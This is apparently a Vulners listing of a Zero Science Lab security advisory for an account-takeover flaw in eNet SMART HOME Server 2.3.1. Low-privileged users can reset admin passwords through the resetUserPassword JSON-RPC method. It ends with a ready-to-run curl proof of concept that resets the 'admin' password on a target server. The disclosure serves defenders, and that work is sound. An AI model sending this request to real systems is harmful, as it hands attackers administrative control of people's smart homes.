Vulners
Lucene search
📄 eNet SMART HOME Server 2.3.1 Account Takeover
eNet SMART HOME server 2.3.1 (resetUserPassword) Account Takeover
Vendor: Gira Giersiepen GmbH & Co. KG | ALBRECHT JUNG GmbH & Co. KG | Insta GmbH
Product web page: https://www.enet-smarthome.com
Affected version: 2.3.1 (46841)
2.2.1 (46056)
Summary: Two German specialists in building systems technology are jointly bringing
a new, wireless-based smart home system to the market. Gira and JUNG are the companies
behind the eNet SMART HOME brand with our subsidiary, INSTA, responsible for developing
the system. All three of us are old hands when it comes to building automation, and
have a history of connecting buildings in an intelligent way that goes back as far as
the 80s. Gira, JUNG and INSTA were part of the group of companies that initiated and
founded EIBA (now known as KNX). KNX is the first open global standard for home and
building automation. Through KNX, we have decisively shaped the development of intelligent
building systems technology – and this wealth of experience has now come together in
eNet SMART HOME. The eNet server is the heart of every eNet SMART HOME system and
offers end customers the basis for an easy-to-use and secure Smart Home and installation
engineers easily understandable and professional commissioning of the system.
Desc: The eNet Smart Home system contains an authorization flaw in the resetUserPassword
functionality that allows any authenticated low-privileged user (UG_USER) to reset the
password of arbitrary accounts, including those in the UG_ADMIN and UG_SUPER_ADMIN groups,
without supplying the current password or having sufficient privileges. By sending a crafted
JSON-RPC request, an attacker can overwrite existing credentials. This is a a direct account
takeover via improper authorization, resulting in full administrative access and persistent
privilege escalation.
Tested on: GNU/Linux 4.4.15 (ARMv7 revision 5)
Jetty(9.2.z-SNAPSHOT)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2026-5974
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2026-5974.php
07.02.2026
--
$ curl -X POST "http://TARGETIP:8080/jsonrpc/management" \
-H "Content-Type: application/json" \
-H "Referer: http://TARGETIP:8080/serverconfiguration.html?icp=99e5DE8sJ81b2yR3NAB0" \
-H "Cookie: INSTASESSIONID=2txt9zmzo8ij3cfdyagulvb7s" \
--data '{"jsonrpc":"2.0","method":"resetUserPassword","params":{"userName":"admin","defaultPassword":"12345678"},"id":"15"}'Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8